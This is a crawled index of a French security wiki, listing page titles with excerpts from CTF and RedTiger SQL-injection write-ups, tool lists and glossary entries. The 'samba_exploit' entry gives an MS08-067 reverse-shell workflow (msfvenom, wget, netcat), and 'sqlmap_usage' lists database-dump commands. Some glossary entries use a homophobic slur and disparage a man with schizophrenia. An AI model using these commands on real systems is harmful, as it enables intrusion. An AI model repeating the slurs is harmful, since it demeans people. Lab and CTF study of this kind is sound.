---------- forensic1 ---------- file : for1.pcapng c'est un dump USB trame usb (Dumpcap 1.10.8) le pkt 902 50:77:6e:69:75:6d:7b:34:30:38:31:35:38:63:31:31:35:61:38:32:31:37:35:64:65:33:37:65:38:62:33:32:39:39:64:31:66:39:33:7d:0a:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00…

pwnium2k14_misc1

2017-04-09T15:33:57+02:00

Cette épreuve à 1 point consistait à copier / coller le flag qui était affiché.

pwnium2k14_misc2

2017-04-09T15:33:57+02:00

---------- MISC Look Closer ---------- MISC.rar est un jpg renommer Misc.jpg ouvrir dans paint zoom à fond parcourir Pwnium{361a8212dda49824b8fdb70ce48f2f60}

pwnium2k14_prog1

2014-07-06T15:22:22+02:00

Énoncé Le but de cette épreuve était de battre le jeu 2048 en moins de 3:30. Pour rappel, le but du jeu est d'obtenir le nombre 2048 en fusionnant les numéros qui apparaissent sur le plateau. Une fois connecté au serveur via netcat, ce dernier renvoyait le challenge de cette manière :

pwnium2k14_reverse1

2017-04-09T15:33:57+02:00

L'épreuve consiste en un ELF qui répète « Baby Crackme » si on le lance. En l'ouvrant avec IDA, on remarque qu'il compare argc avec 1, et saute ailleurs si c'est strictement plus grand. Le code vers le quel il saute est le suivant : .text:08048471 loc_8048471: ; CODE XREF: main+Dj .text:08048471 mov dword ptr [esp], 'G' ; c .text:08048478 call _putchar .text:0804847D mov dword ptr [esp], '0' ; c .text:0804…

pwnium2k14_reverse2

2014-07-06T19:20:00+02:00

Cette épreuve est constituée d'un exécutable livré avec SDL.dll Quand on lance l'exécutable, on nous propose de jouer à un clone du jeu Snake : En reversant l'application avec IDA, on localise le main en 0x402A98 grâce aux appels de l'API de SDL servant à initialiser la librairie ainsi que la fenêtre SDL :

pwnium2k14_web2

2014-07-06T19:23:53+02:00

Cette épreuve est relativement simple, mais tire sa difficulté dans le fait qu'elle a été release dans la dernière demi heure avant la fin du CTF. Le site web est constitué d'un simple formulaire authentification, composée d'un champ de Login / Password.

pwnium_ctf

2017-04-09T15:33:57+02:00

Reverse * Baby crackme * Old World * Kernel Land * NoDebug * Breakpoints Web * GuestBook * XPath Pwn * pwn100 * Be a robot Misc * main() * Look Closer * So basic * is_empty? * Number and sh*t * Remote KG Crypto * break_me

pwnium_ctf2k14

2017-04-09T15:33:57+02:00

python

2019-10-25T12:58:24+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [bandit]() - a tool to find common security issues in Python code 🛠 [bellybutton]() - a linting engine supporting custom project-specific rules

quelque_outils_en_ligne

2019-05-26T19:10:31+02:00

Online steganography service, hide message or file inside an image : Forensic-magnifier :

rainbow_table

2012-07-02T16:13:05+02:00

Time-Memory Trade-Off La première idée pour ce compromis temps-mémoire a été publiée par M. E. Hermann en 1980 et améliorée par Rivest (un des Mr RSA) en 1982. Le principe est de calculer un certain nombre m de chaînes de hash de longueur t (longueur de la chaîne, pas du hash). On doit se fixer un espace de clef précis (key space en anglais). Par exemple, [[:digit:]]{1,5}. On donne le nombre de mots de passe total N.

ransomware

2020-03-22T23:40:16+02:00

Ransomware Overview :

raspberry_pi

2019-12-22T05:08:07+02:00

[Raspberry Pi Model B] [Raspberry Pi logo] Le Raspberry Pi est un ordinateur monocarte à taille carte de crédit de très faible coût qui a été conçu dans le but principal d'enseigner la programmation informatique aux enfants. Il a gagné une popularité parmi les hackers de matériel.

redtiger

2017-04-09T15:33:57+02:00

Adresse du hackit : http://redtiger.labs.overthewire.org Nombre de niveaux : 10 * Level 1 * Level 2 * Level 3 * Level 4 * Level 5 * Level 6 * Level 7 * Level 8 * Level 9 * Level 10

redtiger_level1

2017-04-09T15:33:57+02:00

Redtiger level 1 Adresse de l’épreuve : Dans ce premier niveau, nous avons accès à une page prenant en paramètre un numéro de catégorie. Un indice concernant le nom d’une table de la base de données est également présent : level1_users.

redtiger_level10

2017-04-09T15:33:57+02:00

Redtiger level 10 Adresse de l’épreuve : L'objectif de ce dernier challenge est d'obtenir un accès au compte de l'utilisateur TheMaster. Lors de la soumission du formulaire, une chaîne encodée en base64 est envoyée au serveur.

redtiger_level2

2015-06-21T19:51:55+02:00

Redtiger level 2 Adresse de l’épreuve : Pour ce niveau 2, un formulaire d'identification est affiché. Notre objectif est donc d'outrepasser cette identification pour nous connecter. Pour cela, nous devons injecter un payload qui fera de la requête finale une condition vraie.

redtiger_level3

2017-04-09T15:33:57+02:00

Redtiger level 3 Adresse de l’épreuve : Cette épreuve nous présente une page prenant en paramètre une chaîne de caractère et affichant des informations sur un utilisateur. Nous supposons que cette chaîne de caractère est chiffrée du fait de sa forme ressemblant à l'algorithme Base64.

redtiger_level4

2017-04-09T15:33:57+02:00

Redtiger level 4 Adresse de l’épreuve : Cette épreuve se présente sous la forme d'une page présentant le nombre de résultats retournés par une requête MySQL. Ce résultat change en fonction du paramètre id de l'url : http://redtiger.labs.overthewire.org/level4.php?id=1.

redtiger_level5

2017-04-09T15:33:57+02:00

Redtiger level 5 Adresse de l’épreuve : Cette épreuve repose sur une mauvaise implémentation (encore une fois). Notre objectif ici est d'outrepasser l'authentification en sachant que le mot de passe est chiffré en utilisant l'algorithme MD5.

redtiger_level6

2017-04-09T15:33:57+02:00

Redtiger level 6 Adresse de l’épreuve : Dans cette épreuve, il fallait comprendre que deux requêtes étaient imbriquées l'une dans l'autre. Le résultat de la première était utilisé pour la deuxième. Un indice est donné; nous devons récupérer le premier utilisateur de la table level6_users avec un statut égale à 1.

redtiger_level7

2017-04-09T15:33:57+02:00

Redtiger level 7 Adresse de l’épreuve : Dans cette épreuve, l'objectif est de récupérer le nom d'utilisateur ayant posté une news à propos de google. Un indice est donné; celui de la colonne autor dans la table level7_news. Un champ de recherche est disponible sur la page, en l'utilisant simplement, cela donne :

redtiger_level8

2017-04-09T15:33:57+02:00

Redtiger level 8 Adresse de l’épreuve : Dans cette épreuve, notre objectif est de récupérer le mot de passe de l'administrateur. Nous avons un formulaire permettant de modifier ses informations. Contrairement aux précédents challenges, notre injection se fera via une requête de type UPDATE.

redtiger_level9

2017-04-09T15:33:57+02:00

Redtiger level 9 Adresse de l’épreuve : L'objectif de ce challenge est de récupérer les mots de passes et nom d'utilisateur de la table level9_users. Il est spécifié que ce n'est pas une injection de type BLIND. Le champ texte est vulnérable aux injections. En testant un payload valide; nous nous sommes rendu compte que le script n'affichait que les chiffres. En effet, avec un payload comme ceci, le résultat de l'opération est affiché:…

reseaux_sociaux

2020-04-01T00:03:56+02:00

Tous * Eagle Eye Le but estr de trouver les principaux réseaux sociaux de John Doe * Obtenir les comptes de notre cible sur les principaux réseaux sociaux. Facebook * Facebook_OSINT_Dump Outil Windows permettant de faire de l’OSINT sur les profiles Facebook.

reverse_engineering

2019-03-20T15:19:03+02:00

Cette page a pour but de réunir différents articles sur le reverse-engineering * GDB Cheatsheet : un document qui récapitule diverses astuces pour GDB * Ghidra : Listes de ressources sur Ghidra

richard_stallman

2018-01-27T18:56:16+02:00

[Richard Matthew Stallman] Richard Matthew Stallman (rms) est un hacktiviste, programmeur, et militant du logiciel libre. Il est l'auteur du projet GPL et GNU. Qui est-il, cependant? Richard Stallman a commencé à travailler dur pour répliquer la sortie de l'équipe Unix, mais sous la GPL, ce qui signifiait que n'importe qui pouvait utiliser, lire, modifier ou distribuer le code source. Une fois que cela a été combiné par Linus Torvalds avec le noyau de Torvalds, GN…

rtfm

2018-01-27T18:29:39+02:00

RTFM (Read the Fucking Manual), est une phrase auto-explicative qui remonte à l'antiquité, généralement en réponse à de nouvelles faggotries. Utilisation Quand un nouveau pose une question évidente, plutôt que d'amuser leur stupidité, on leur dit simplement “RTFM”.

ruby

2019-10-25T12:59:04+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [brakeman]() - A static analysis security vulnerability scanner for Ruby on Rails applications 🛠 [cane]() - Code quality threshold checking as part of your build

ruby_on_rails

2019-10-25T12:58:47+02:00

FIXME Le PAD pour proposer une amélioration à cette page : - A static analysis security vulnerability scanner for Ruby on Rails applications

rue

2018-01-22T02:08:11+02:00

Rich User Experience (ou RUE en abrégé) est un terme inventé par l'artiste net et philosophe Olia Lialina dans un essai publié début 2015. Un RUE est un site qui essaie trop dur d'émuler un logiciel, et donne une sensation de convivialité quand il n'en faut pas. Il peut également s'agir d'un SaaS Web 2.0. Essentiellement, tout site Web qui a quelque chose qui pourrait être fait dans 1 Mo mais prend 40 Mo, et supprime d'une manière la liberté à l'utilisateur final, est un RUE. Un RUE est la plupa…

samba_exploit

2020-09-28T22:59:22+02:00

exploit SMB VULN MS08-067 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py on copie le shellcode dans le commentaire python ms08-067.py 10.10.10.4 6 445 root@kali:~/OSCP/VMs/10.10.10.4/MS17-010# netcat -lnvp 443 listening on [any] 443 ... C:\WINDOWS\system32>

scala

2019-10-25T12:59:19+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [linter]() - Linter is a Scala static analysis compiler plugin which adds compile-time checks for various possible bugs, inefficiencies, and style problems.

sciences_participatives

2021-03-07T11:51:34+02:00

Les sciences participatives (parfois appelées «sciences citoyennes» ou «sciences collaboratives») sont «des formes de production de connaissances scientifiques auxquelles des acteurs non-scientifiques-professionnels — qu’il s’agisse d’individus ou de groupes — participent de façon active et délibérée».

scoreboard

2023-10-20T15:16:18+02:00

CTF Purple pill Rank: 01 Points: 28001 Team: Hackwakwnd ... Rank: 13 Points: 1160 Team: Gardian pack Rank: 14 Points: 1150 Team: Zenk CTF Barbhack Rank: 01 Points: 6778 Team: Synacktiv ... Rank: 10 Points: 2174 Team: ZeOS by HiP Rank: 11 Points: 2093 Team: Hackcyom Rank: 12 Points: 1768 Team: ZENK - RED PEARL

script_kiddie

2017-11-05T00:46:51+02:00

["Code by Numbers" (c)2001 Bill Holbrook.] Un Script Kiddie (aussi appelé skid) est un terme utilisé pour désigner les enfants idiots qui trouvent des extraits de code sur Internet, les compilent ensemble, et en font un virus ou un autre programme malveillant qu'ils ne savent pas contrôler, ni même ne comprennent. Ces personnes causent de la confusion, du retard et nuisent à tout le monde. En raison de leur analphabétisme technologique, ils sont généralement rapidement trouvés, arrêtés et …

securite_web

2012-06-27T13:56:39+02:00

Choses à faire ---------- * Apprendre l'HTML et le CSS -> Lien * Apprendre le Javascript-> Lien * Apprendre le PHP -> Lien - Lien - Lien * Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -> Lien - Lien * Comprendre comment fonctionne le vol de sessions -> Lien * Apprendre à éxploiter les XSS, persistantes et et non persistantes -> Lien - Lien - Lien - Lien - Lien * Apprendre à exploiter les CSRF -> Lien - Lien * Appre…

series_tv

2021-01-30T21:37:41+02:00

Cette page fournit une liste de séries tv qui gravite autour des sphères de la technologie, science-fiction, mais aussi des séries cyberpunks, etc... Comédies Max Headroom (1987 - 1988) " Basé sur le film du même nom. Pire que le film a tous les niveaux. Vous connaissez ça probablement seulement à cause de la fois ou une personne avais takeover une station de télé pour diffusé un signal pirate avec la tête de Max Headroom."

series_tv_anime

2018-06-11T09:31:48+02:00

Cette page fournit une liste de séries d'animation qui gravite autour des sphères de la technologie informatique, science-fiction, cyberpunk. Battle Programmer Shirase Battle Programmer Shirase (BPS バトルプログラマーシラセ, Bīpīesu Batoru Puroguramā Shirase) abrégé en BPS est une sérié animée japonaise comique sortie en 2003 et produite par AIC. La série compte 15 épisodes de 10 minutes chacun.

shell

2019-12-31T20:15:54+02:00

🛠 ShellCheck - finds bugs in your shell scripts.

shitposting

2018-01-28T02:22:52+02:00

Le Shitposting est l'acte d'afficher de grandes quantités de contenu agressivement, ironiquement, et de troll de ”mauvaise qualité” à un forum en ligne ou réseau social, dans certains cas destinés à faire dérailler une discussions ou rendre le site inutilisable pour ses visiteurs réguliers. Le shitposting peut être défini comme un post non-constructif et sans valeur.

sjw

2018-01-28T00:12:04+02:00

Les Social Justice Warrirors sont des gens qui s'offusquent au nom d'autres personnes, principalement sur des sujets de diversité, de racisme, de sexisme, d'homophobie, de transphobie, etc. Warriors est le mot clé dans cette description. Alors que de nombreuses personnes ordinaires sont contre le racisme, un SJW va se battre dans la bataille pour se défendre contre tout racisme perçu, peu importe à quel point un saut logique doit être fait. Les commentaires humoristiques et sarcastiques sont so…

sommaire

2015-06-27T21:13:35+02:00

Le sommaire a été déplace en page d'accueil : https://wiki.zenk-security.com/doku.php

sourceforge

2018-01-28T00:39:29+02:00

SourceForge est un site d'hébergement de logiciels. Commencé à la fin des années 1990, il était le site de projet logiciel le plus populaire avant que Git et CSV ne remplacent ces services Web. Sourceforge a été lancé en 1999 et offre à ses utilisateurs un référentiel pour le code, un outil de suivi des bogues, une liste de diffusion, un espace de blog et surtout un miroir pour les téléchargements des exécutables. Le modèle de revenus est basé sur des annonces publicitaire.

sqlmap_usage

2019-10-26T00:18:07+02:00

# Basic usage ./sqlmap.py -u “inject address” --dbs enumerate database ./sqlmap.py -u “inject address” --current-db current database ./sqlmap.py -u “inject address” --users column database user ./sqlmap.py -u “inject address” --current-user current user ./sqlmap.py -u “inject address” --tables -D “database” enumerate the table name of the database ./sqlmap.py -u “inject address” --columns -T “table name” -D “database” get the column name of the table ./sqlmap.py -u “inject address” --dump…

ssh

2017-11-04T17:53:15+02:00

SSH (Secure Shell) est à la fois un programme informatique et un protocole de communication sécurisé. Le protocole de connexion impose un échange de clés de chiffrement en début de connexion. Par la suite, tous les segments TCP sont authentifiés et chiffrés. Il devient donc impossible d'utiliser un sniffer pour voir ce que fait l'utilisateur.

ssh_configuration

2018-08-27T10:38:10+02:00

Une fois le serveur OpenSSH installé, ouvrez le fichier /etc/ssh/sshd_config et décommentez les lignes suivantes : RSAAuthentication yes PubkeyAuthentication yes AuthorizedKeysFile %h/.ssh/authorized_keys Redémarrez le serveur via la commande suivante :

stay_alive

2017-04-09T15:33:57+02:00

Overview Dans ce challenge, on nous fourni une application Windows Phone (qui est un paquet Silverlight). Un paquet Silverlight est une archive au format ZIP avec l’extension .XAP. Décompressez cette archive devrait vous donnez une multitude de fichier, ainsi qu'un appelé ndh_stay-alive.dll.

stripe_ctf

2012-08-29T21:24:43+02:00

Enonce "We'll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes... You can access the Secret Safe at . The Safe's code is included below, and can also be obtained via git clone . "

suppression_de_logiciel_malveillant_windows

2017-11-04T12:20:10+02:00

Vous avez échoué à utiliser du bon sens, et maintenant votre ordinateur est infecté. Que faire ? Une réponse * Backup * Reformaté * Réinstallé (Source: ) Mais si vous DEVEZ ... Si vous avez des barres d'outils ou des add-ons répertoriés dans les programmes et les fonctionnalités, essayez de les désinstaller.

techniques_de_nettoyage

2017-11-04T12:01:49+02:00

Écrans Les écrans (y compris les téléphones) peuvent être nettoyés avec un chiffon en microfibres et de l'eau: * Éteignez l'écran. * Utilisé un flacon pulvérisateur et envoyer une légère brume sur une partie du chiffon. * * Ne pas faire tremper le chiffon. Juste un peu d'humidité suffit. * * Ne pas pulvériser de l'eau directement sur l'écran. L'eau pourrait rentrer et court-circuiter l'électronique. * Effectuer des mouvements circulaires avec le chiffon pour nettoyer l'écran. Vous de…

telechargement_et_installation_d_un_logiciel_de_virtualisation_virtualbox

2013-06-14T10:14:52+02:00

le lien pour télécharger le programme VirtualBox est : La procédure d’installation sous windows est la suivante : Cliquez sur Next Cliquez sur Next Cliquez sur Next Cliquez sur Yes Cliquez sur Install

temple_os

2018-01-22T02:17:44+02:00

[Capture d'écran de TempleOS] Temple OS, anciennement LoseThos, et plus récemment Sparrow OS, est un système d'exploitation conçu pour être un Temple de Jésus-Christ, développé par le schizophrène Terry A. Davis. TempleOS est un système d'exploitation de PC x86_64, multitâche, multi-cœur, domaine public, open source, ring-0-uniquement, carte d'adresse unique (mappage d'identité), sans réseau, pour la programmation récréative. Il colle au matériel commun 64 bits au lieu de pilotes distincts.…

terry_davis

2019-05-12T15:09:41+02:00

Terry A. Davis (15 décembre 1969 - 11 août 2018) est un schizophrène connu et a fait Temple OS dans une tentative de faire un temple du 21ème siècle à Dieu et à Jésus. En outre, il croit être capable de parler à Jésus via les ports nethost localhost du système.

trouver_des_exploits_publique

2024-05-17T14:53:54+02:00

FIXME Le PAD pour proposer une amélioration à cette page : offline : * un outil comme searchsploit mais qui cherche sur exploit-db et : * SearchSploit * -> git clone * -> apt update && apt -y install exploitdb * -> searchsploit -u #upd…

ubuntu

2017-11-05T01:35:42+02:00

[Logo Ubuntu] [Le bureau par défaut dans Ubuntu] Saveurs d’Ubuntu [Le bureau par défaut dans Xubuntu ] Les variantes officiellement reconnues d’Ubuntu sont les suivantes: * Xubuntu utilise l’environnement de bureau Xfce. * Lubuntu utilise l’environnement de bureau LXDE. * Kubuntu utilise l’environnement de bureau KDE. * Ubuntu GNOME utilise l’environnement de bureau GNOME. * Ubuntu MATE utilise l’environnement de bureau MATE. * Ubuntu Studio est conçu pour …

une_liste_de_site_qui_font_des_audits_web_gratuitement

2020-05-13T13:10:07+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Outils gratuits 🛠 🛠 🛠 Pulsedive - scans of malicious URLs, IPs, and domains, including port scans and web requests.

unicode_comme_canal_steganographique

2014-03-15T16:18:10+02:00

⚠‍͏ cette page utilise beaucoup de caractères que vous ne voyez potentiellement pas, n'hésitez pas à copier&coller dans un terminal du texte echo -n 'texte' | hd pour constater la présence d'octets invisibles ⚠‍͏ Qu'est-ce qu'Unicode ? Unicode est le système utilisé pour numériser du texte aujourd'hui. C'est le consortium unicode qui s'en occupe.

vbs_script

2019-10-25T12:59:37+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠[Test Design Studio]() :copyright: - A full IDE with static code analysis for Micro Focus Unified Functional Testing VBScript-based automated tests.

wiki_communautaire

2024-12-18T15:54:10+02:00

Bonjour et bienvenue sur le wiki de la communauté Zenk-Security. Vous trouverez ci-dessous un sommaire des articles. Si vous souhaitez contribuer au wiki, merci de consulter la page expliquant son fonctionnement avant. Bonne visite ! Vous trouverez ici les différentes catégories disponibles pour le wiki ainsi que des ressouces intéressantes.

windows

2019-08-10T10:28:59+02:00

Auditer la sécurité d un poste windows Vérifier la sécurité d'une GPO open scap

windows_10

2017-11-05T01:45:09+02:00

[Windows 10 n'est pas votre ami ] Il existe une forte probabilité que Windows 10 soit compromis. Ce système d'exploitation est malveillant, cela a été prouvé maintes et maintes fois non seulement qu'il datamine et vole des informations sur l'utilisateur, mais il a été conçu pour faire ceci. Installer Windows 10 à vos risques et périls.

windows_7

2017-11-05T01:49:05+02:00

[Windows 7 logo] Avec la sortie de Windows 10 sont venue des mises à jour pour Windows 7 (et 8/8.1) Microsoft a rajouté des spywares qu'il appelle des “fonctionnalités” pour faire de la télémétrie. Il est possible de désactivé tout ça grâce au script d'Aegis.

writeups

2023-07-27T16:42:46+02:00

* Newbie Contest * RedTiger * Exploit Exercises Protostar * Nuit du Hack Public Wargame 2012 * Stripe CTF 2012 * CSAW CTF 2012 Quals * 29c3 CTF * Overthewire.org Narnia * Nullcon BattleUnderground * Forbidden Bits * CSAW CTF 2013 Quals

wysiwyg

2018-01-21T23:13:54+02:00

Les termes WYSIWYG (prononcé /wɪ.zi.wig/ ou /wi.zi.wig/) ou tel écran, tel écrit désignent en informatique une interface utilisateur qui permet de composer visuellement le résultat voulu, typiquement pour un logiciel de mise en page, un traitement de texte ou d’image. C'est une interface « intuitive » : l’utilisateur voit directement à l’écran à quoi ressemblera le résultat final.

xss_reports

2020-07-01T08:09:50+02:00

Compilation de rapports XSS

youtube

2019-03-11T16:28:38+02:00

YouTube est un site web d’hébergement de vidéos, et un média social sur lequel les utilisateurs peuvent envoyer, regarder, commenter, évaluer et partager des vidéos. la plateforme et centralisée, propriétaire, applique une politique de censure et appartient a Google.

yubikey_4_chiffrer_signer_ssh_github_tuto

2019-10-29T13:37:55+02:00

Hello, Je me suis décidé à configurer ma Yubikey 4 qui prenait la poussière depuis quelques temps. Bon, je suis pas sur que le temps passé dessus en valait la chandelle mais c'est fait, du coup je vous fais un tuto pour utiliser une Yubikey 4 en tant que smartcard OpenPGP.

zenk_roulettes

2014-07-21T22:22:56+02:00

* Pixie CMS * PluXml 5.0.1 * Alex Guestbook Version 5.0.2 * SoftBB 0.1.3 * Cacti 0.8.7g * B2evolution Beta 4.0.0.1 * Xoops 2.5.7

zeronet

2018-07-14T23:46:50+02:00

ZeroNet (ou ZeroNetwork) est un programme libre et open source qui connecte l'utilisateur qui l'exécute au réseau ZeroNet. ZeroNet est sous licence GPL version 2.0.(1) ZeroNet a pour but d'offrir un accès Internet «gratuit et non censuré» (2) à tous. Il est écrit en python et est basé à Budapest, en Hongrie. Afin de rendre son Internet décentralisé, ZeroNet utilise la cryptographie bitcoin pour chiffrer les données et le réseau BitTorrent afin d'héberger des “zites”. Il n'est pas anonyme par dé…

Zenk - Security

29c3

aaron_swartz

active_directory

ada_lovelace

alsa

analyse_basique_des_malwares

analyse_copie

analyse_d_un_disque_dur_de_donnees

android

anonymisation

antitrust

app_forensic

app_stegano

app_web

apprentissage

archives

batteries_externes

burpsuite

c_c

c_sharp

carte_-_cheat_sheet_-_des_outils_pour_pentest_active_directory

carte_-_des_outils_d_investigation_numerique

carte_-_des_outils_en_cryptographie

carte_-_des_outils_l_audit_de_code

carte_-_des_outils_pour_browser

carte_-_des_outils_pour_pentest_active_directory

carte_-_des_outils_pour_webapp

carte_-_des_outils_pour_wifi

cheatsheet_wifi

chiffreur_de_clavier_keyscrambler

code_scanners

compilation_de_payloads

compilation_de_rapports_de_bug_bounty

compilation_de_ressource

compilation_de_ressources_outils_reseau

compilation_de_ressources_outils_web

compilation_de_vm_web_vulnerables

config_files

configurer_burpsuite_sur_genymotion_emulateur_android

copie_support

crypto-monnaie

csaw2012_quals

csaw_ctf_2013_quals

ctf_mssis_ctf

ctf_thc_toulouse_hacking_convention

dctf_qual_2014

dell_personnage_public

dennis_ritchie

des_outils_pour_audit_le_dns

des_outils_pour_automatiser_google_hacking_database

des_outils_pour_du_post_exploitation

des_outils_pour_effacer_ses_traces_sur_un_serveur

des_outils_pour_exploiter_les_xxe

des_outils_pour_faire_des_tests_d_autorisation

des_outils_pour_faire_un_audit_sur_la_cryptographie

des_outils_pour_faire_une_cartographie_d_un_site

des_outils_pour_la_deserialisation

des_outils_pour_outre_passer_les_waf

des_outils_pour_race_condition

des_outils_pour_scanner_des_cms

des_outils_pour_scanner_des_fichiers_et_dossiers_interessant

des_outils_pour_scanner_des_webapp_et_des_services_web

des_outils_pour_scanner_des_xss

des_outils_pour_scanner_et_exploiter_des_injections_de_template

des_outils_pour_scanner_et_exploiter_des_lfi

des_outils_pour_scanner_les_misconfiguration

des_outils_pour_scanner_les_ssrf

des_outils_pour_scanner_les_xxe

des_outils_pour_scanner_si_le_site_est_victime_de_malware

des_outils_pour_scanner_ssl

des_outils_pour_un_scan_complet

des_ressources_et_outils_pour_l_exploitation_des_browsers

des_ressources_et_outils_pour_les_injections_sql

destruction_de_donnees

disque_dur

disque_dur_externe

dns

ecran_de_veille

edward_snowden